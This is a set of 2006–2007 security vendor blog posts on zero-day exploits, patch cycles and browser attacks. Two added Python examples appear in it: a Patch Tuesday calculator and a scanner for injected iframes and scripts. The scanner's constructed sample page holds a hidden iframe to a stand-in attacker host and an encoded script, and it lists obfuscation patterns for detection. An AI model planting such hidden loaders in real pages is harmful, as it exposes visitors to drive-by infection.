Please stay secure against the PDF vulnerabilities, as we continue to protect our customers against such threats.

MoAB is Upon Us!

No, it’s not a Massive Ordnance Air Blast Bomb, thankfully. But could users of Apple software feel that it’s really that bad? January 2007 is the Month of Apple Bugs (MoAB), in which a new Apple-related vulnerability is announced for every day of the month.

The first two MoAB bugs affect Apple QuickTime and VLC Media Player respectively. If exploited, both bugs would allow remote code execution; however, user interaction is needed.

MoAB is a project similar to November 2006’s Month of Kernel Bugs (MoKB). The bugs released during the MoKB affected software from a gamut of vendors, including Apple, Linux, Microsoft, NetGear, and others. In both projects, security researchers announce previously-unknown bugs in selected software in order to raise awareness about the state of security in these software products.

While many MoKB bugs remain un-patched and the software they affect remains vulnerable, Apple users affected by MoAB can thank Landon Fuller for some temporary relief. Landon, a system architect, has promised to develop unofficial patches for software affected by MoAB bugs.

The researchers at McAfee Avert Labs will continue to follow MoAB closely, so keep reading!

Month of Apple Bugs, not strictly a Mac problem

Well, we’ve seen the first of the promised bugs for Apple and Apple products as a part of the “Month of Apple Bugs”. And perhaps unsurprisingly, the first bug is also applicable to Windows, being a buffer overflow vulnerability in QuickTime. Some are also saying that this may be rather difficult to implement.

So in short, this month of bugs that’s supposed to take Mac fans down a peg…also exposes holes in Windows. And maybe it works, maybe it doesn’t. Way to start it off with a bang, there!

As a Mac fan who realizes Apple software is written by humans just like any other software, which will inevitably have the occasional bug, perhaps I’m not the demographic they’re looking to deflate. But really, I think you’d be hard pressed to find even the most rabid Mac fan who believes Apple software is 100% bulletproof. That’s just plain deluded. I think most Mac users at this point are of the opinion that it’s more akin to the risk of mosquito bites in August at Crater Lake versus in January at the South Pole. There are just a lot more nasty critters flying around the Windows environs than the OS X environs for the time being.

But even from a strictly researcher perspective, I am curious to see what this month brings up, both in terms of exploits and the discussion around them. Expect to see lots more here on that subject as things progress!

Do Exploit Writers Ever Go on Vacation?

Apparently not! On December 20, a new zero-day exploit for Microsoft Windows operating systems was released. This exploit targets a weakness in the Client Server Run-Time Subsystem, and allows local privilege escalation or denial of service.

Microsoft has acknowledged this vulnerability and admitted that its newest operating system, Windows Vista, is vulnerable.

Keep reading for more on exploits released this holiday season. Happy holidays!

Bot pangs - The pain of patching

Malware authors have been proactive in incorporating exploit code for almost every newly reported vulnerability into bots, with utmost professionalism. Apart from the numerous Microsoft Windows vulnerabilities where exploit code has been methodically incorporated into bot code, McAfee Avert Labs is seeing a trend where popular applications from software vendors are being targeted. In recent weeks we have seen bots that target vulnerabilities or weak passwords in the following applications:

Famatech Remote Admin http://vil.nai.com/vil/content/v_140984.htm
Symantec Antivirus http://vil.nai.com/vil/content/v_140978.htm

Although the vulnerabilities in the above software are dated and patches are available, bot authors still found them enticing enough to target machines running vulnerable versions of these software applications.

Other popular software applications with vulnerabilities that have been targeted by bots in the recent past include:

Most of the major software vendors like Adobe, Microsoft and Oracle now follow a monthly patching cycle, and administrators have their hands full in ensuring that every machine on the network is patched. Sadly, most administrators do not have the flexibility to deploy patches immediately to machines on the network for policy reasons. For example, the organization could be using legacy software which could break if a new service pack were applied, and keeping these legacy applications running takes precedence over applying the latest hot fixes. In rare cases a fix could break something else in the operating system or adversely affect other applications. Administrators need more time to first deploy these hot fixes in a test environment and QA them properly before deploying them to the entire enterprise.

Given the trend where malware authors are expanding their attack horizon by targeting vulnerable software applications, it wouldn’t be surprising if an exploit directed at popular instant messaging (IM) clients should surface. IM is popular in both consumer and corporate networks, and an exploit that gives a remote shell on a machine running an instant messenger would be stunningly effective.

That being said, it will be interesting to wait, watch and revisit this topic if and when an instant messenger remote shell exploit surfaces.

McAfee Avert Labs 2007 Threat Predictions PodCast

Today, Avert Labs announced the availability of its podcast on the “Top Ten Security Trends in 2007”.

As part of this podcast, McAfee will identify those threats it believes businesses and consumers will face in 2007 as computer criminals become more organized and professional in their approach.

Download the podcast

Critical IE Vulnerability [WebViewFolderIcon - CVE-2006-3730]

Once again, in the name of “software security”, exploit code has been posted publicly that targets an unpatched Microsoft Internet Explorer (IE) vulnerability. This has been labeled as a 0-day exploit, but the first public release of this vulnerability happened on July 18, during a well-known vulnerability researcher’s “Month of Browser Bugs” bloganza. The original proof-of-concept code posted to the blog resulted in IE crashing. The code released yesterday and today allows for the execution of arbitrary code.

I contend that a public exploit released 2+ months after the initial 0-day attack cannot be considered a 0-day.

Of course in the real world, it doesn’t make much difference. As I write this blog entry, Microsoft hasn’t yet acknowledged this threat, but I suspect that we will see some information soon, only 72+ days after the 0-day attack was made public. Call it a 0-day, or call it a 72nd-day; either way users are still vulnerable.

That said, the odds of being attacked by this threat were extremely low two days ago. Now that exploit code has been served up on a platter for the bad guys to use, we can expect many attacks for some time to come.

Why is it that some vulnerability researchers feel victorious upon the release of a vendor patch, when it comes at the expense of so many innocent victims? Or maybe this really isn’t about making software more secure.

The PatchGuard arms race has begun!

It was only a matter of time, but the first security ISV has publicly announced a product that bypasses PatchGuard. Authentium announced today that their Authentium ESP Enterprise Platform can bypass PatchGuard. In a world where less than 1% of known threats exploit the kernel in a way that PatchGuard will block, and where only 15 of 264 (less than 6%) Microsoft vulnerabilities from 2004-2006 would have been protected by PatchGuard, according to our calculations, I’m not sure whether to laugh or cry.

PatchGuard is an attempt to close a software hole with more software. As Joanna Rutkowska has amply proven, there is no software-only solution to the rootkit problem. Hardware solutions like Intel’s Vanderpool or AMD’s Pacifica are required to harden PatchGuard to the point it cannot be broken, but they will not be widespread in the field for years to come. And in closing one small hole, it’s opening a host of others, like those addressed by the behavioral, anti-rootkit, and HIPS features we, and other vendors, have been working on for years. Arguably, our solutions are not immune to this same problem, the difference being that instead of one solution from a newbie security vendor, consumers today can deploy multiple solutions from many seasoned vendors to create a layered defense strategy, even at a desktop level.

So in the meantime, MS is going to try to put their fingers in the dike of PatchGuard holes, which are more valuable to security vendors than to malware authors, who can just avoid the kernel structures MS is trying to protect. In many ways, this is the final manifestation of the logical conclusion I came to when Greg Hoglund first announced his NT rootkit: we are, and always have been, locked in an arms race with the malware authors and hackers. Microsoft has just taken away our most effective weapons.

Microsoft is putting McAfee, Authentium, Symantec, Sunbelt and the rest of the security community in the interesting position of having to tell our customers that we can’t protect them beyond a reactive AV signature without “hacking” their operating system. So if we can’t protect them, and Microsoft can’t protect them (and won’t let us), what are consumers and enterprises to do? Right now, security vendors and Microsoft are in a very public standoff. It will be interesting to see what happens when Microsoft’s own customers chime in on this issue. What do you think?

Zero-Day Vulnerability Follows October ‘06 Patch Tuesday

Patch Tuesday refers to the second Tuesday of each month, when Microsoft releases security updates for its products. As a matter of policy, Microsoft releases patches only on Patch Tuesday. (One recent exception to this was an out-of-cycle patch for the Internet Explorer VML vulnerability.)

The researchers at McAfee Avert Labs follow Patch Tuesday with interest: Microsoft’s products are used by the lion’s share of industry and home users, and un-patched vulnerabilities in Microsoft’s products can often have an impact on global security.

Back in July 2006, Patch Tuesday fell on July 11. On July 12, a Trojan, Exploit-PPT.b, was released. This Trojan exploited a previously-unknown Microsoft PowerPoint vulnerability.

An exploit for a new vulnerability follows a Patch Tuesday. A one-time event?

This month, on 12 October 2006, two days after the October Patch Tuesday, we discovered a zero-day exploit in the wild for a new Microsoft PowerPoint 2003 vulnerability, CVE-2006-5296. Microsoft has said on its TechNet blog that this exploit could carry out code execution on the victim’s machine.

Security expert Bruce Schneier has commented that exploits might be released to follow a Patch Tuesday to maximize the “window of exposure”, the time until next month’s Patch Tuesday arrives with security patches for the new vulnerability.

Is Zero-Day Wednesday (or Thursday) going to become a trend? We’ll be watching.
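As an added worked example of the “window of exposure” arithmetic (editor-supplied, not from the post or from Microsoft), the Python below computes a month’s Patch Tuesday as its second Tuesday and measures how many days an exploit sighted on a given date has until the next scheduled patch day, assuming no out-of-cycle fix ships. Run on the two dates in the post it gives 27 days for Exploit-PPT.b (July 12 to August 8, 2006) and 33 days for CVE-2006-5296 (October 12 to November 14, 2006); `window_by_release_offset` generalizes that to any day of the post-patch week, which is the planning figure a patch-management team actually needs.

```python
from datetime import date, timedelta

TUESDAY = 1  # date.weekday(): Monday == 0


def patch_tuesday(year, month):
    """Second Tuesday of the month, Microsoft's regular security-update day."""
    first = date(year, month, 1)
    first_tuesday = first + timedelta(days=(TUESDAY - first.weekday()) % 7)
    return first_tuesday + timedelta(days=7)


def next_patch_tuesday(after):
    """First Patch Tuesday strictly after the given date (a fix released the same day
    as an exploit would have had to ship on that Tuesday already)."""
    candidate = patch_tuesday(after.year, after.month)
    if candidate <= after:
        year, month = (after.year + 1, 1) if after.month == 12 else (after.year, after.month + 1)
        candidate = patch_tuesday(year, month)
    return candidate


def exposure_window(exploit_seen):
    """(next patch day, days until it) for an exploit first seen on exploit_seen,
    assuming the vendor waits for the regular cycle rather than shipping out-of-band."""
    if isinstance(exploit_seen, str):
        exploit_seen = date.fromisoformat(exploit_seen)
    nxt = next_patch_tuesday(exploit_seen)
    return nxt, (nxt - exploit_seen).days


def window_by_release_offset(year, month):
    """Scheduled exposure for an exploit released 0..6 days after that month's Patch Tuesday."""
    pt = patch_tuesday(year, month)
    return {offset: exposure_window(pt + timedelta(days=offset))[1] for offset in range(7)}


if __name__ == "__main__":
    for seen in ("2006-07-12", "2006-10-12"):  # the two sightings the post describes
        nxt, days = exposure_window(seen)
        print(f"exploit seen {seen}: next Patch Tuesday {nxt}, {days} days of scheduled exposure")
    print(window_by_release_offset(2006, 10))
```

The figure is an upper bound on the scheduled gap, not the real exposure: an out-of-cycle release such as the VML patch mentioned above shortens it, and a month with five Tuesdays before the next second Tuesday lengthens it, which is exactly why the dictionary form is more useful than a single number.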

Microsoft Security Advisory (925984) [CVE-2006-4694]

To follow up on my Another Day, Another 0-day post; today (Sep 27, 2006), Microsoft has released a security advisory for this vulnerability:

Microsoft Security Advisory (925984)
Vulnerability in PowerPoint Could Allow Remote Code Execution

The following versions of PowerPoint are affected:

• PowerPoint 2000
• PowerPoint 2002
• PowerPoint 2003
• PowerPoint 2004 for Mac
• PowerPoint v. X for Mac

CVE-2006-4694 was assigned for this vulnerability on Sep 11, 2006.
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4694

“Another Day, Another 0-day”

As one zero-day gets patched (Microsoft released an out-of-cycle patch for the recent VML Fill vulnerability), another is found.

Today we discovered an exploit affecting Microsoft PowerPoint (preliminary testing shows Office 2000, Office XP, and Office 2003 are affected). A single target of this exploit has been identified, so like other recent Microsoft Office 0-day discoveries, it appears that this one is also a targeted attack.

What makes this attack interesting is the fact that it appears that Microsoft’s antivirus product added detection three days ago. The only public information on these threats is the boilerplate Malicious Software Encyclopedia entries (which show an incorrect discovery date of Sep 26, when virus definition files from Sep 23 already detect them):

There isn’t a public advisory from Microsoft, suggesting that Microsoft’s security team knew of this in-the-wild attack but did not make the information public.

For the record, I am not a fan of full disclosure (the concept, not explicitly the mailing list). I believe that more money has been lost, more data stolen, and more illegal activity around exploits has happened because of full disclosure. Historically, those with the skills to find vulnerabilities and create exploits are not the ones who write Blaster and Sasser, etc. Generally, the people who heavily abuse exploit code have “copy & pasted” the work of others. They customize the payload and release, and in these cases damages would have been significantly reduced if it were not for the availability of exploit details.

That said, if an attack is in the wild, acknowledgment of the attack is not something to conceal. Non-disclose the nitty-gritty details, but do inform.

- Update Sep 27, 2006 9:30 -
Correction, coverage went into the 4861 DAT release.

- Update Sep 26, 2006 17:00 -
McAfee antivirus coverage for these two exploits was released earlier today in DAT version 4860; detected as Exploit-PPT.d trojan.

Internet browsers and cyber-crime.

Thousands of websites are compromised every day. Many end up defaced or vandalized with greetz to the hacker and flames to the system administrator for failing to maintain server security. Defacing is the lowest form of internet graffiti and is usually done for fun or attention.

More sinister is when organized crime groups use compromised web servers to host malware. The compromised web pages are modified to host zero-day exploits which compromise users via drive-by downloads, or the servers can be used as staging servers for trojan downloaders to pull and push further malware. Attack script toolkits like WebAttacker are being sold on the internet and are then custom configured to infect visiting computers without any user interaction. An attacker only needs to send spam email or instant messenger messages inviting recipients to visit a compromised website hosting the vulnerability and its malware exploit.

So how does one know where the attacks will come from? What can be done to track down the bad guys and combat them? One of many ways is to scan the internet for vulnerable systems and then monitor the sites that are found to be vulnerable, waiting for them to be hacked. Once a site is compromised, don’t attempt to get the compromised server shut down, as that would only make the bad guys move elsewhere. Rather, keep an eye on the server and monitor it for any malicious uploads and downloads.

To quote a recent example, when code for the Exploit-WMF was released, a security company was able to come up with a listing of over a hundred sites that were compromised and hosting this exploit, much faster than the big search engines indexed the Internet. Critics may argue that this is akin to watching the enemy plant landmines and waiting for hapless victims to step on them because one happens to be in the business of manufacturing prosthetic limbs. The more intel that can be gathered, the better the chance the security community has of shutting down the bad guys. Let us all work with the law enforcement and intel communities.

The internet is a scary place as crime increasingly becomes an omnipresent menace. The window between vulnerability discovery and its incorporation into exploit code has shrunk from months or weeks to true zero-day, as attackers and security experts are perpetually in a race against time. Browser vulnerabilities and exploits such as Exploit-VMLFill are just a prelude to a series of pending exploits that pose the fastest-growing threats to internet surfing. At the time of writing, a security update to address this vulnerability is being worked on by Microsoft, and their goal is to release the update on Tuesday, October 10, 2006, or sooner.

With ever-increasing browser-based attacks, it is more important than ever that users not trust seemingly familiar or safe links, particularly when received via instant messengers, Internet Relay Chat or email. McAfee Avert Labs is committed to continued research against all known exploits of the Vector Markup Language vulnerability and will continue to update our coverage as new attack vectors and threats emerge. The problem will not go away... but we can sure make life difficult for the bad guys.

Critical 0-Day Microsoft Internet Explorer Exploit Discovered In The Wild

Last night Sunbelt blogged about a zero-day IE exploit being discovered in the wild. This attack has taken shape much the way Exploit-WMF did back in December 2005. A trojan toolkit known as WebAttacker was updated to include exploitation of a new Vector Markup Language buffer overflow vulnerability. This toolkit is known to be sold on the underground for as little as $17 US, but just like the Exploit-WMF case, we can expect exploit source to be readily available shortly.

General advice around this kind of attack is to stay on the straight and narrow path while touring the Internet. However, WebAttacker has historically been installed on compromised web servers, and we’ve seen message board posts and blog entries that include iframes referring to other sites that are running WebAttacker. Disabling JavaScript effectively neuters known attacks. Using an alternate web browser also thwarts this attack.

Microsoft has posted an advisory including workarounds:
http://www.microsoft.com/technet/security/advisory/925568.mspx

McAfee product coverage (including proactive 0-day protection) can be found here:
Exploit information: http://vil.nai.com/vil/Content/v_140629.htm
Vulnerability information: http://vil.nai.com/vil/Content/v_vul26881.htm

P.S. As I write this entry, Exploit-WMF remains the top most-reported malware blocked by our VirusScan Online products.
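Both this post and “Internet browsers and cyber-crime” above come down to the same monitoring task: fetch a page you already know, and notice when an iframe or script that its author never wrote has appeared in it. As an added example (editor-supplied, not a McAfee tool and unrelated to WebAttacker’s own code), the Python below scans HTML for iframes that point off-site or are rendered invisibly and for inline scripts that use common obfuscation idioms, then diffs the findings against a known-good baseline so a monitor only alerts on what changed. The two sample pages and the host names `www.example.com` and `attacker.example` are constructed for the example.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Obfuscation idioms typical of injected loaders; any one is a reason to look closer.
SCRIPT_SIGNALS = {
    "unescape()": re.compile(r"\bunescape\s*\(", re.I),
    "fromCharCode": re.compile(r"fromCharCode", re.I),
    "eval()": re.compile(r"\beval\s*\(", re.I),
    "long %xx run": re.compile(r"(?:%[0-9a-f]{2}){16,}", re.I),
}
HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)


def host_of(url):
    host = urlparse(url or "").hostname
    return host.lower() if host else None  # None for relative URLs


def is_hidden(attrs):
    """Zero/one-pixel frames or CSS-hidden frames: nothing a visitor is meant to see."""
    tiny = any(str(attrs.get(k, "")).strip().lower().rstrip("px") in ("0", "1")
               for k in ("width", "height"))
    return tiny or bool(HIDDEN_STYLE.search(attrs.get("style") or ""))


class InjectedContentScanner(HTMLParser):
    """Collects iframes and scripts that look injected rather than authored."""

    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host.lower()
        self.findings = []
        self._script = None  # text pieces while inside <script>...</script>

    def _offsite(self, src):
        host = host_of(src)
        return [f"off-site src {host}"] if host and host != self.site_host else []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "iframe":
            reasons = self._offsite(attrs.get("src")) + (["hidden"] if is_hidden(attrs) else [])
            if reasons:
                self.findings.append({"kind": "iframe", "ref": attrs.get("src", ""), "reasons": reasons})
        elif tag == "script":
            self._script = []
            reasons = self._offsite(attrs.get("src"))
            if reasons:
                self.findings.append({"kind": "script", "ref": attrs.get("src", ""), "reasons": reasons})

    def handle_data(self, data):
        if self._script is not None:
            self._script.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._script is not None:
            body, self._script = "".join(self._script), None
            reasons = [name for name, rx in SCRIPT_SIGNALS.items() if rx.search(body)]
            if reasons:
                self.findings.append({"kind": "script", "ref": body.strip()[:60], "reasons": reasons})


def scan_html(html, site_host):
    scanner = InjectedContentScanner(site_host)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


def new_findings(baseline_html, current_html, site_host):
    """Findings in the current fetch that the known-good baseline did not have."""
    def key(f):
        return (f["kind"], f["ref"], tuple(f["reasons"]))
    seen = {key(f) for f in scan_html(baseline_html, site_host)}
    return [f for f in scan_html(current_html, site_host) if key(f) not in seen]


# Constructed sample pages (not captured from any real site).
CLEAN_PAGE = """<html><body>
<script src="/js/menu.js"></script>
<iframe src="/ads/banner.html" width="468" height="60"></iframe>
<script>var visits = 1;</script>
<p>Welcome to our forum.</p>
</body></html>"""

COMPROMISED_PAGE = CLEAN_PAGE.replace("</body>", """
<iframe src="http://attacker.example/in.php" width="0" height="0" style="display:none"></iframe>
<script>document.write(unescape("%3C%73%63%72%69%70%74%3E"));</script>
</body>""")

if __name__ == "__main__":
    for f in new_findings(CLEAN_PAGE, COMPROMISED_PAGE, "www.example.com"):
        print(f["kind"], f["reasons"], f["ref"])
```

Baseline it against a fetch you have reviewed by hand, re-fetch on a schedule, and alert only on `new_findings`; legitimate third-party widgets will show up once, at baseline time, rather than on every run.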

WMF exploit “wombles” up

McAfee Avert Labs has received samples of a new mass-mailing worm that we call http://vil.nai.com/vil/content/v_140497.htm. What makes it noteworthy is that this worm sometimes sends itself as an ordinary zipped binary attachment, but sometimes mass-mails out Exploit-WMF with itself inside (zipped or non-zipped). The worm is packed inside a modified UPX container and is 78,336 bytes long.

The now-ubiquitous WMF exploit first appeared in December 2005, and since then it has been one of the most common attack vectors for home users. McAfee AV products have provided proactive detection of known malformed WMF files that can exploit the WMF vulnerability.

McAfee Avert Labs releases first issue of Sage!!!!

An epic transformation in the world of security is upon us. Today, we released the first issue of our semi-annual security magazine Sage. We will leverage this communication vehicle to deliver meaningful and sometimes raw content to the masses. We take our responsibility to protect the public from malicious malcontents very seriously and will not shy away from difficult content or taboo topics. Instead, we will share with the world our day-to-day fight and let you decide how important the concepts being broached are to you.

The premiere issue examines the use of open source by the malware-writing community. We show the pivotal role that code sharing and full disclosure have played in the evolution of the threat environment, and we anticipate a surge in malware quality and reliability as the malware writers become more professional. Though open source cannot be blamed for how some unsavory individuals may choose to use its tools, techniques, and methodologies, the movement should acknowledge that there are dangers associated with some of its fundamental beliefs.

Sage is meant to be a forum for thought leadership and serious discourse on topical security issues. By drawing on the Labs’ wealth of data and expertise, and writing challenging security articles, we hope to provoke important discussion about the digital battlefield we have found ourselves in.

Get Sage now from the McAfee Threat Center site:

http://www.mcafee.com/us/threat_center/white_paper.html